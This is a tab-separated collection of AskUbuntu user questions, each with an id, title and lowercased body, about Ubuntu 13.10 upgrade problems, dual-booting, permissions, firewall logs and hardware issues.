361131	how can i find out what .desktop file is being launched ?	i 've used click install and click register to install a click app on ubuntu ( not ubuntu touch ) . the version was 0.5.1 . now , a new version ( v0.5.6 ) is available and i installed it using the same method . i know the new version is installed because the current directory points to 0.5.6 : $ ll /opt/click.ubuntu.com/com.ubuntu.developer.mdspencer.ubuntu-tasks/ total 16 drwxr-xr-x 4 clickpkg clickpkg 4096 oct 18 10:19 ./ drwxr-xr-x 8 clickpkg clickpkg 4096 sep 13 21:22 ../ drwxr-xr-x 10 clickpkg clickpkg 4096 sep 13 20:01 0.5.1/ drwxr-xr-x 10 clickpkg clickpkg 4096 oct 18 10:19 0.5.6/ lrwxrwxrwx 1 clickpkg clickpkg 5 oct 18 10:19 current - > 0.5.6/ however , when i launch the application from the dash , the about page still shows v0.5.1 . so my question is , how can i find out where the .desktop file that i 'm launching resides so i can understand why the correct version is n't being launched ? i 'm also simply curious to learn where the click .desktop files live . is there some tool that shows where a given .desktop file is , or is there a way to see the equivalent to $ path for .desktop files ? note : this is similar to , but not a duplicate of , how to find the .desktop files for pinned applications in the unity launcher ?
361134	`` sorry , ubuntu 13.04 has experienced an internal error '' with upgrader core	after i did all software updates in 13.04 , i tried to upgrade to 13.10 . i got the `` sorry , ubuntu 13.04 has experienced an internal error '' message . it says the package is `` ubuntu-release-upgrader-core 1:0.192.13 '' and the problem type is `` crash '' . what do i do now ?
361136	system hangs on logout after upgrading to 13.10	this is the first time i 'm having problems during ubuntu upgrade . i have nothing to do except pressing the power button until shutdown in the black screen when i choose to log out from the session indicator menu . any ideas that can help me out will be much appreciated . i hope i do n't have to do a clean install to get rid of this minor problem .
361137	ubuntu launcher for android devices ?	i know that right now , it 's only available for the google nexus . i was just wondering , will ubuntu become a `` home launcher '' for android devices sometime in the future ? i really like the os . i have the htc one right now , it would be nice to be able to install ubuntu as a launcher .
361140	how do i go back to windows 8 ?	i have accidently installed ubuntu on my windows 8 64bit partition . i have only had one partition . now i can not go back . can you help me with a solution to go back to my windows 8 ?
361145	restart returned to session indicator menu after upgrading to 13.10	this is the first time i 'm having problems during ubuntu upgrade . i had previously enabled the new unity logout/shutdown dialogs and the restart option had gone . but now it 's back again , though utterly useless , because each one leads to the same new unity dialog : restart or shutdown . i wonder how i can get rid of this duplicate menu option ?
361148	freenx , nomachine , upgrade from 3.5 to 4.0 . now asking for subscription	i recently upgrade nomachine freenx from 3.5 to 4.0 and now the host server will not start giving an error message that says that my subscription does not match the machine . i have made fresh installs of the 4.0 version on 3 other machines and they work great . any idea of how to completely remove the 3.5 edition so that the 4.0 installation looks like a fresh install ? thanks
361149	why are there 2 firefox icons in the launcher , and other issues	all , for some reason , a second launcher icon when i run firefox : ( attempting to add image ) has anyone seen this before ? also : an open firefox window does not show up when cycling through applications using alt+tab ... weird ! edit : after restarting , i was able to remove all firefox launcher icons . now , however , when i opened firefox , there was no launcher icon showing . restarting firefox , now there is a launcher icon . perhaps the problem is resolved ... -m
361151	disable auto mounting	for my assignment , i need to disable the auto mount , and mount my usb dive manually . can you please help me with that problem . and also struggling with how to find my usb when the auto mounting is disabled . regards , jag
361152	i have ufw block messages from local network machines , how can i analyse if they are malicious ?	i 'm getting a lot of messages in my ufw log , and i 'm trying to figure out if these are malicious or just normal . a udp broadcast is coming from a windows laptop x.x.x.191 , and some from our synology disks x.x.x. { 6,8,10,11 } . i have not figured out which macine 114 is yet . i would appreciate some advice in how to read the log , and get the most i can out of these calls . oct 18 17:03:34 < myusername > kernel : [ 4034.755221 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:06 : e8:19:08:00 src=x.x.x.6 dst=x.x.x.169 len=364 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=47978 len=344 oct 18 17:03:34 < myusername > kernel : [ 4034.755292 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:1b : e8:8f:08:00 src=x.x.x.10 dst=x.x.x.169 len=366 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=47978 len=346 oct 18 17:03:34 < myusername > kernel : [ 4034.756444 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e : c0 : c1 : c0:52:18 : ea:08:00 src=x.x.x.8 dst=x.x.x.169 len=294 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=47978 len=274 oct 18 17:03:34 < myusername > kernel : [ 4034.756613 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e : c0 : c1 : c0:52:18 : ea:08:00 src=x.x.x.8 dst=x.x.x.169 len=306 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=47978 len=286 oct 18 17:03:34 < myusername > kernel : [ 4034.760416 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:1e:6a:33:08:00 src=x.x.x.11 dst=x.x.x.169 len=366 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=47978 len=346 oct 18 17:03:36 < myusername > kernel : [ 4036.215134 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=x.x.x.169 len=424 tos=0x00 prec=0x00 ttl=128 id=11155 proto=udp spt=1900 dpt=47978 len=404 oct 18 17:04:23 < myusername > kernel : [ 4083.853710 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=652 tos=0x00 prec=0x00 ttl=1 id=11247 proto=udp spt=58930 dpt=3702 len=632 oct 18 17:04:24 < myusername > kernel : [ 4084.063153 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=652 tos=0x00 prec=0x00 ttl=1 id=11299 proto=udp spt=58930 dpt=3702 len=632 oct 18 17:07:02 < myusername > kernel : [ 4242.153947 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=18702 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:07:02 < myusername > kernel : [ 4242.275788 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=18703 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:12:29 < myusername > kernel : [ 4569.073815 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=30102 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:12:29 < myusername > kernel : [ 4569.242740 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=30103 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:17:02 < myusername > kernel : [ 4841.440729 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=9195 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:17:02 < myusername > kernel : [ 4841.553211 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=239.255.255.250 len=680 tos=0x00 prec=0x00 ttl=1 id=9196 proto=udp spt=58930 dpt=3702 len=660 oct 18 17:19:10 < myusername > kernel : [ 4969.294709 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:25:36:26:02:86:08:00 src=x.x.x.114 dst=239.255.255.250 len=923 tos=0x00 prec=0x00 ttl=1 id=27103 proto=udp spt=3702 dpt=3702 len=903 oct 18 17:19:10 < myusername > kernel : [ 4969.314553 ] [ ufw block ] in=eth0 out= mac=01:00:5e:7f : ff : fa:00:25:36:26:02:86:08:00 src=x.x.x.114 dst=239.255.255.250 len=923 tos=0x00 prec=0x00 ttl=1 id=27104 proto=udp spt=3702 dpt=3702 len=903 oct 18 17:33:34 < myusername > kernel : [ 5832.431610 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:1b : e8:8f:08:00 src=x.x.x.10 dst=x.x.x.169 len=366 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=55281 len=346 oct 18 17:33:34 < myusername > kernel : [ 5832.431659 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:06 : e8:19:08:00 src=x.x.x.6 dst=x.x.x.169 len=364 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=55281 len=344 oct 18 17:33:34 < myusername > kernel : [ 5832.431865 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:11:32:1e:6a:33:08:00 src=x.x.x.11 dst=x.x.x.169 len=366 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=55281 len=346 oct 18 17:33:34 < myusername > kernel : [ 5832.433024 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e : c0 : c1 : c0:52:18 : ea:08:00 src=x.x.x.8 dst=x.x.x.169 len=294 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=55281 len=274 oct 18 17:33:34 < myusername > kernel : [ 5832.433224 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e : c0 : c1 : c0:52:18 : ea:08:00 src=x.x.x.8 dst=x.x.x.169 len=306 tos=0x00 prec=0x00 ttl=64 id=0 df proto=udp spt=1900 dpt=55281 len=286 oct 18 17:33:37 < myusername > kernel : [ 5834.914484 ] [ ufw block ] in=eth0 out= mac=f0 : de : f1:71 : c3:2e:00:22:19 : de:80 : a4:08:00 src=x.x.x.191 dst=x.x.x.169 len=424 tos=0x00 prec=0x00 ttl=128 id=10075 proto=udp spt=1900 dpt=55281 len=404
361154	light display manager as login account	yesterday i installed ubuntu 13.10 , and since i rebooted my laptop , there is a user account called light display manager as available option on my login screen . a password is needed for login , but i do n't know it , although i tried some . because of some answers i modified with sudo power one file as follows ( added lightdm ) : cat /etc/lightdm/users.conf # # user accounts configuration # # note : if you have accountsservice installed on your system , then lightdm will # use this instead and these settings will be ignored # # minimum-uid = minimum uid required to be shown in greeter # hidden-users = users that are not shown to the user # hidden-shells = shells that indicate a user can not login # [ useraccounts ] minimum-uid=500 hidden-users=nobody nobody4 noaccess lightdm hidden-shells=/bin/false /usr/sbin/nologin â but it did n't changed anything ! what is this ? why is this there ? how can i remove ( if it 's unnecessary ) ? thanks in advance for an answer !
361156	no partitions in ubuntu isntallation	today , with the new version of ubuntu , i have decided to install it in my laptot , but running with windows 8 , which is the os i have installed now and that i do n't want to uninstall , because i need some programs . i have downloaded it and burned into a cd . everything in the `` installation '' goes right untill i have to choose where to install it . it does n't recognise my windows 8 and , moreover , it sees my disk as it was all empty space ( 500gb ) . i ca n't install it and i do n't know what to do , so let 's see if you can help , because you know a lot more than me in this topic : ) thanks !
361168	ca n't mount disk	i used to access to this drive all the time but one day could not do it anymore . i used to have linux mint . after this error y moved to ubuntu ... but the problem remains . here error mounting /dev/sda3 at /media/diego/022de33218d7fb16 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/diego/022de33218d7fb16 '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
361169	vostro 3560 , removed raid metadata , installed ubuntu , easy way to go back ?	i decided a while back that i wanted to dual boot my new vostro 3560 so after looking at a few forums i found that i needed to remove the raid metadata using dmraid . at this point i could only boot into windows and ubuntu through legacy boot but i was n't fussed at the time . now after a few issues with ubuntu i have decided i want to go back to a clean install of windows 7 ( ie factory reset ) , easy i thought , just need the drivers from dell and will install a clean install with the serial number on the bottom of the laptop ... oh there is n't a serial number on the bottom ? there is a recovery partition but i can not for the life of me access it . i have booted into windows and tried everything . holding shift , pressing every key on the keyboard when booting but nothing allows me to access the recovery partition ! it is definitely there as i can see it with disk manager . if i reenable uefi secure boot there are no boot options . if i create a boot option it allows me to select a device but then asks me to enter a path but i do n't know what to enter here . the dell app in windows also wont allow me to create recovery media either as i get an error . also the windows create a system repair disk wont work . i really feel like i am running out of options and am considering sending the laptop back to dell ( if i hav n't voided the warranty ) but i rely on the laptop for work so can not be without it for more than a few days . any guidance here would be very much appreciated and i would be eternally in your debt : ) if i hav n't provided enough detail i would be happy to provide more .
361170	13.10 : ubuntu one has no contextual menu item or icons on folders	since installing 13.10 on my computer , my folders syncing with ubuntu one do not have any icons on them ( tick , arrows etc ) to signify the state of the folder . also , upon right-clicking , there is no ubuntu one menu either . is this a bug ? or is there a way i can fix it ?
361171	i am part of a group , but i can not create files	i wanted to change the group of the /var/www directory to www-data , which i did by executing the command sudo chown -r root : www-data /var/www . i then added myself to that www-data group by doing sudo adduser jeroen www-data . to finally give the www-data group the right permissions for that directory , i did sudo chmod -r g+w /var/www . when i then use nautilus to browse to that directory , using the jeroen account , i can not create or edit any files in it . what did i do wrong ?
361172	how do i best install ubuntu in a certain language with a keyboard layout specific to another language ?	i am installing ubuntu 13.10 : i want to use it in an english spoken environment , but my keyboard layout is an “exotic” one specific to french ( bépo dvorak-way ) . until now , what i used to do was the following : install ubuntu in french during the installation , choose my keyboard layout ( bépo dvorak-way ) after installation , change the language to english and remove all french translation packages . is there a better way ? note : in the past , this seemed to be the best method due to the installer limitations .
361175	software installation failure !	i get the same error whenever i try to install software on my laptop , for example : i want to install pavucontrol . so , i open the terminal and i type sudo apt-get install pavucontrol and my terminal output is : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgconfmm-2.6-1c2 libglademm-2.4-1c2a libpulse-mainloop-glib0 padevchooser paman paprefs pavumeter pulseaudio-module-zeroconf the following new packages will be installed : libgconfmm-2.6-1c2 libglademm-2.4-1c2a libpulse-mainloop-glib0 padevchooser paman paprefs pavucontrol pavumeter pulseaudio-module-zeroconf 0 upgraded , 9 newly installed , 0 to remove and 172 not upgraded . 1 not fully installed or removed . need to get 0b/345kb of archives . after this operation , 2044kb of additional disk space will be used . do you want to continue [ y/n ] ? y perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` el_gr.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17. dpkg : `ldconfig ' not found on path . dpkg : 1 expected program ( s ) not found on path . nb : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . e : sub-process /usr/bin/dpkg returned an error code ( 2 ) what is the problem and how do i fix it ?
361177	installing sigil on ubuntu 13.10	i found this post : installing sigil on ubuntu 13.04 , but it does n't work for ubuntu 13.10 . there is no package for saucy . is there a way to install sigil for 13.10 ?
361178	custom regional formats - keyboard layouts	i leave in belgium , i use my computer in english and i want âź as my currency symbol . is that possible in ubuntu ? my keyboard layout is us but i want to add fr language with us intl layout , and fr as label . is that possible ?
361180	gvim glib-gobject-warning in ubuntu 13.10	i upgraded from ubuntu 13.04 to ubuntu 13.10 this afternoon . and when i try starting vim form the terminal after the upgrade , i get these warnings ( gvim:4054 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( gvim:4054 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( gvim:4054 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( gvim:4054 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised` how can i fix these and what exectly are these warnings about
361181	aamazonaws malware in my ubuntu 12.04 lts	i need your help . today i found ( using wireshark ) many requests are being thrown from my system to some other system and vice-versa . when i did the reverse dns then i found it is amazonaws malware . can any one please give me solution on how to tackle it . need help thanks
361182	at the beginning of an ubuntu installation , what means the âkeyboard = humanâ symbol ?	at the very beginning of the booting of an installation media ( typically a usb stick ) , before even choosing your language , there is an intriguing symbol . it represents a keyboard , an equal sign ( = ) and a circled human . this circled human is similar to the accessibility symbol in gnome . what does the symbol mean and what would happen if i press a key at that time ?
361188	install incorect password	when i try yo use wubi , to install ubuntu 12.04 , side by side with windows 7 , i get an incorrect password error .
361189	aptana , titanium menu bar problem with ubuntu 13.10	after upgrading into ubuntu 13.10 i have problems with aptana and titanium ide . menu bar does n't work normally . only one menu works , in aptana `` window '' menu , in titanium `` run '' menu . other menus looks like empty . here is the pics : aptana : titanium : also hud doesnt search in that menus . what is the problem ?
361194	chrome home page is set to an unwanted website , how do i change it ?	when i use chrome and go to a page , automatically and without doing anything , it goes to a redirect to the page repelis.tv and then to recpelis.com . what can i do ? now i 'm using firefox , but i prefer to use chrome .
361195	how do i import contacts from a vcf file on ubuntu-touch ?	how do i import contacts from a vcf ( vcard ) file or google to ubuntu phone . i tried this command : syncevolution -- sync one-way-from-server google_contacts addresbook but it fails with the error [ error ] no such source ( s ) : addressbook'
361197	failed to resume normal boot from recovery mode xubuntu 13.10	i just upgraded my xubuntu to the latest version 13.10 . i noticed that recovery mode failed to resume into normal boot and went into terminal tty instead . is there way to track this problem ?
361202	what to do after wipe ?	i have a major problem in regard to ubuntu 13.10 . today i was installing in on my ubuntu 12.04/windows 8.1 pc . i selected the option of installing along side of ubuntu 12.04 and windows 8.1 . after installing i tried to boot into windows 8 . it was gone ! ubuntu 12.04 was gone as well ! now i was frustrated and tried to get to my recovery partion . that was gone too ! is there anyway to get my data back ? thx , andrew
361203	how can i make the mouse cursor hide itself when typing ?	it gets in the way . i 'd like to have it disappear when i start typing , then reappear if i move it . i 've heard of unclutter but it sounds like it hides the cursor after it 's been `` idle '' for a while , which is n't what i want -- i only want to hide when i 'm typing . how could i do this ?
361204	multiple extensions chromium not working after update to 13.10	it seems like after updating to ubuntu 13.10 and chromium 29.0 multiple extensions have stopped working . reddit enhancement suite and smoothscroll are among them . some extensions partially work , like adblock . others , like webtimer and collusion still work as they did before . i realize this might be slightly off topic if the problem lies with the new version of chromium . however , it may very well be something about the new version of ubuntu , or perhaps a bit of both .
361205	nm-applet crash sometimes when use cdma	i have had a problem since 13.04 and seems that problem persist to 13.10 too . this problem is described pretty extensive in this thread on ubuntu forums and in bug # 1179070 on launchpad . does anyone of you have any idea what could be ? only can restart nm-applet from terminal but all link seems to be corrupted . this is the output : ( nm-applet:2478 ) : glib-critical ** : g_variant_new_string : assertion 'g_utf8_validate ( string , -1 , null ) ' failed *** error in `nm-applet ' : corrupted double-linked list : 0x098a2738 ***
361209	nexus7 wo n't boot after saucysalamander crash	i easily managed to get the current preinstalled build working on my nexus7 from osx by following the manual download & installation instructions . it worked quite good for a few minutes and crashed . i was able to reboot it via adb . after that i wanted to use the settings while a few other apps were already running and it froze again . this time adb gave me a no device found error which seemed weird so i tried again but nothing happened . shortly after that i got the message that it was drawing too much power from usb and had been disabled . i tried to hard-reboot it with power+volumedown and even volume up but nothing happened except for the screen to go completely black after power+volumedown . now i 'm not able to get any reaction . i tried a lot from waiting to endlessly pressing the button . even switching the usb cable and connecting again but nothing seems to work . i 'll try charging it for a few hours now and then resume trying but if anyone experienced similar problems or has any suggestions please go ahead .
361210	how to set the default terminal window screen co-ordinates when ctrl + alt + t is pressed ?	i would like my terminal to show up at a specific co-ordinates on my screen when ctrl + alt + t is pressed . currently , terminal always shows up in the top-left corner . i have to drag each and every time to the middle of the screen . i 'm using 12.04 and could n't find any such options in the menu as far as i could see . i read somewhere that something like gnome-terminal -- geometry= '' some co-ordinates here '' would bring this effect , but the instructions are for previous ubuntu versions that does not have unity desktop . so , how can i achieve this in 12.04 unity desktop ?
361214	make icon for firefox 24 on ubuntu 13.04	how does one make a shortcut for firefox ( like any other application that has an icon ) that has a command . firefox 24 run from terminal . reason i had to uninstall previous version ( 20 ) of firefox was because it was crashing often . this version ( 24 ) is stable ( and looks like it will continue to be so ) . i am at present running from terminal : firefox 24 need that i make an icon which opens it and most important overlay menu ( like in mac ) which is not happening at present .
361215	hard drive clicking on z500 ( 13.10 )	i have recently installed ubuntu 13.10 on my laptop , which is a lenovo z500 . everything works nicely so far , but occasionally there is some hard drive clicking . i tried using the command : hdparm -b 255 /dev/sda with no avail , though . can anyone help ? this laptop has been problematic with a lot of linux distributions , and it always had that same clicking problem . if there is some more info that i can provide , just tell me , and i 'll edit the post . the hard drive is a seagate st500lt012-9ws142 . edit # 1 : as this question has been marked as a possible duplicate , i should add more info . i 've read the posts that have been suggested , and i came across using the hdparm command , which , as i said , does not work for me . as someone else suggested , the file /usr/lib/pm-utils/power.d/95hdparm-ap should be edited . i have not tried that on ubuntu 13.10 , and i will attempt it , but as far as i remember , the hdparm command is being issued in that script as well . i will also attempt to edit /etc/hdparm.conf , and will come back with the results . i 'd also like to add that i did try these two methods on other distros , and they did n't give the wanted result . : / but , yes , i understand that those are other distros and that these methods might work on ubuntu , so i 'll try . edit # 2 : editing /etc/hdparm.conf did not bring any satisfactory results . the clicking is still occurring . the code used was : /dev/sda { apm = 254 apm_battery = 254 }
361216	how to install ubuntu touch	where i can download ubuntu touch ( read somewhere it is already out for galaxy nexus and nexus 4 ) and is it compatible with samsung galaxy s4 . is there any tutorial available for the same .
361218	why can an unauthorized user have full access to an smb share they have no permissions on ?	the 'clients ' user whom is only supposed to have access to the 'backups ' share has full write access to the 'data ' share . why is this ? ( shares are all at bottom of paste ) /etc/samba/smb.conf : http : //paste.ubuntu.com/6258594/
361219	disable keyboard battery notifications in 13.10	i 've updated to 13.10 , and i 'm getting notifications every hour or so that my wireless keyboard battery is low ... while it 's sort of clever that ubuntu can do this now and wants to show it off , a `` low '' wireless keyboard battery still lasts for weeks , and there 's no apparent way to shut the notifications off ... any help ?
361225	where do i find drivers for sony vaio fit15e	no sound is coming from my speakers but it works with headphones in so i 'm guessing i need to find some drivers somewhere ? i ca n't find them . also the touch screen does n't work very well , it does n't scroll the screen down or zoom like a touch screen should . any help would be greatly appreciated : )
361226	some bazaar packages are missing in ubuntu 13.10 ( especially bzr-svn )	yesterday i installed bazaar on ubuntu 13.10 . i also installed bazaar plugins i use but some plugins installation failed because of missing packages . in my case the missing packages were bzr-svn and bzr-gtk . for bzr-gtk it is not a big problem since the qbzr package is still in saucy repositories . but afaik there is not any alternative for bzr-svn , i.e . using bazaar with subversion ( not git or other vcs ) . i know that git could be an intermediate step in a potential workaround ( using both bzr-git and git-svn ) . i also know that the svn project could be migrated from svn to git ( and then use bzr-git ) . but i want to avoid those two things if possible . so my questions are : how to use bazaar in subversion projects on ubuntu 13.10 ? is there a way to have bzr-svn ( and bzr-gtk too ) on ubuntu 13.10 ? will bzr-svn ( and bzr-gtk too ) be back later in ubuntu 13.10 repositories or in future ubuntu versions ?
361230	windows 7 & ubuntu 13.04 bad dual boot	i installed ubuntu 13.04 on d : while windows 7 on c : chosing option side by side . but ubuntu ate my 40gb partition + 3gb swap with ext4 and no dual boot . my studio 15 still on win7 . tried to install ubuntu boot repair through ctrl+alt+t but it says it is not present in e : also tried to delete ubuntu ext4 partions but ended up in free space which neither can be formatted nor be merged . presently re-installed ubuntu 13.04 with same above condition . what to do ? ? also want to add that in g parted menu i selected dev/sda6 as my ubuntu partition and same as boot loader install parion .
361231	newest version of a library	newbie here : how does it work , if ubuntu currently features a certain version of a library but there is already a newer version of it at developer 's site , do i have to wait for the next major release of ubuntu to eventually incorporate it ? for example , currently in ubuntu there is libabc-1.2-dev , but the developer already release 1.3 . how to use it , apart from compiling it myself ? in other words , when do new versions come into ubuntu ?
361234	problem with ubuntu touch	running : phablet-flash ubuntu-system -- no-backup i get the following message : info : phablet-flash : device detected as c1505 error : phablet-flash : unsupported device , autodetect fails device can you help me ? thanks
361235	ubuntu 12.04.3 install on ideapad y510p	i 'm having a lot of problems trying to use ubuntu on my laptop , it 's an ideapad y510p . what happens is after installing ubuntu , the laptop boots to a black screen , no grub . the only way to use my laptop after the install is to go to the boot order selection , from here i can boot to windows 8 but if i try to boot into ubuntu i get a black screen ( even if i press fn+up ) although i hear the login sound . i can fix grub by booting from a live dvd and running grub repair , but even with the grub i get the same results as if i went to the boot order selection . i already tried different methods and none them have worked like turning off secure boot installing ubuntu in legacy mode ( bios ) after formatting the disk to mbr installing ubuntu in uefi before and after windows 8 ( formatting disk to gpt ) right now i 'm using windows 8 in uefi . and yes , i 've read the threads with similar problems , including the ones with the same laptop and nothing 's worked .
361236	sony vaio svf1521gsab speakers not working	suddenly my laptop 's speaker not working ... it 's working in output device , but the two front speakers not working . it is fully new , only 1 month used . so what should i do now ?
361237	x11 sesion management from console	how does one switch gnome to gnome classic from the console ? i get yanked into console land by the os . i try to 'startx ' and unity comes back . what the hell ? is there anyway to kill off unity for good ?
361238	ibus incompatible with tor browser in 13.10	i have recently updated to 13.10 from 13.04 and noticed a compatibility issue between the new ibus and the tor browser . basically , the tor browser does not accept any keyboard inputs , while all other programs do . i tested this with the 64 bit versions 2.3.25-11 and 2.3.25-13 and the 32 bit version 2.3.25-13 . according to this thread , quitting ibus `` fixes '' the problem : https : //trac.torproject.org/projects/tor/ticket/9353 any ideas on how to fix this ?
361240	problem updating to new version in terminal	i am unable to use my desktop for two weeks now since an automatic upgrade left me unable to login due a iceauthority error . i 've tried a few solutions , as detailed in a previous question : can not login after update ubuntu 12.04 . iceauthority error message i can access terminal via ctrl/alt/f1 at the login screen and the only option i can see left to me is to upgrade to a newer version . what 's weird is that when i login , i am welcomed to ubuntu 11.10 despite having recently upgraded to 12.04 . this might point to something that has gone wrong . when i tried to do an upgrade , the first time with the command 'do-release-upgrade'i was told no newer version available ( despite it saying precise was available ) . the second time i got : checking for new ubuntu release unhandled exception in thread started by dbound method inetreleasecoredownload of dpacktmanager.core.netrelease.netreleasecore object at ob72e7f8p traceback ( most recent call last ) file `` /usr/lib/python2.7/dist-packages/ ... '' ... socket timeout : timed out terminal then hung third time round the mulberry bush i got welcome to ubuntu 11.10 again and a list of traceback errors then socket timeout if there are typos in my report its because im using a projector as a monitor since my monitor works but does not detect terminal on setup ( inpout signal out of range ) any help with this problem welcomed , i 'm completely baffled . and i 'd love to be able to check my encrypted mail again soon .
361242	'libmtp error : unknown error ' while opening files on android internal storage	i connect my android phone to ubuntu 13.10 through usb to access to its internal storage . whenever i try to open a file directly from the phone memory , it displays an error saying that the file could n't be loaded with this error message : libmtp error : unknown error . but when i copy and paste the same file to my pc , i can open it . for instance , with an image : what could be the problem ? is there a workaround ?
361248	after update to 13.10 : 2nd standby after opening lid	updated the lubuntu from 13.04 to 13.10 on my macbook air . ever since , when i open up the lid after standby , the system wakes from standby but after a few seconds it goes into standby again . there seems to be another ( new ) process putting my device into sleep mode now , too . if i kill xfce4-power-manager , it only goes to standby once . however , it should n't go into sleep at all when xfce4-power-manager is not running . how can i track down the new trigger of the standby mode ?
361249	how do i rescue files from the encrypted home folder via live usb stick ?	i know , this has been asked and answered all over the internet already . however , i start feeling stupid , since the informations there are not helping me . just this morning , i wanted to install the newest update to 13.10 . after the download , when it came to the actual installing , the install program froze and did n't do anything for hours . at that time , i was still logged in . the computer was working and everything was accessible to me . however , i made the mistake and did n't immediately make safety copies of everything . instead , i just rebooted . long story short : my computer even fails to reset to a previous version via grub . but i am able to boot from a usb stick and , after starting nautilus , i see my home folder on the hd . i would now like to copy its contents onto an external hard disk . problem 1 : i have no rights to access the folder like that . problem 2 : it is encrypted . problem 3 : i do n't know how to give myself the rights to access the folder nor do i know how to encrypt it . i assume that it might help that i still know these things : my old login name my old login phrase a 32 characters long string of hexadecimal numbers that i copied to my list of passwords as `` ubuntu encryption code '' . i copied it digitally right after installing ubuntu the first time and encrypting the home folder , so there wo n't be any typos . i am sure of that . the solutions that i saw so far , tell me that i need the `` encryption phrase '' . however , when i follow the instructions and use this phrase that i have in my list , i only get messages of denial . can anyone help me through this special problem , please ?
361250	ethernet card dont work and wireless from other pc do n't works too	i want to install lubuntu on my two old laptops , but i tried a live boot of lubuntu , and i noticed on my laptop the wireless connection does not work . it 's an hp 530 with a wireless card called : wlan broadcom 802.11b/g it has a physical button to turn it on , but the light keep off and it never turns on . the ethernet card from this hp 530 work normally , so i can have access to the internet on lubuntu , but i usually use it with wi-fi . i have another desktop pc who does not work the ethernet card and its does not has wi-fi , so i can connect to any internet connection , the ethernet card of this computer is realtek rtl8139/810x family fast . i will do a fresh install on both pcs and i will not install windows xp again , only lubuntu , so i 'm wondering if i can try to fix these problems without installing lubuntu , i mean from live cd ? if not , its not problem about installing it and try to fix it , but i 'm not the only who uses that pc , and the internet connection is really needed .
361254	internet connection lost after upgrade to kubuntu 13.10	this morning , i upgraded from kubuntu 13.04 to kubuntu 13.10 , and i lost my internet connection after the upgrade . the internet connection is ethernet to a dsl modem . i know there is nothing wrong with the internet as everything else is working . the computer is a desktop pc and only connects to the internet via a dsl modem using an ethernet cable . the error message i am getting is ip configuration was unavailable . can someone explain how to fix this ?
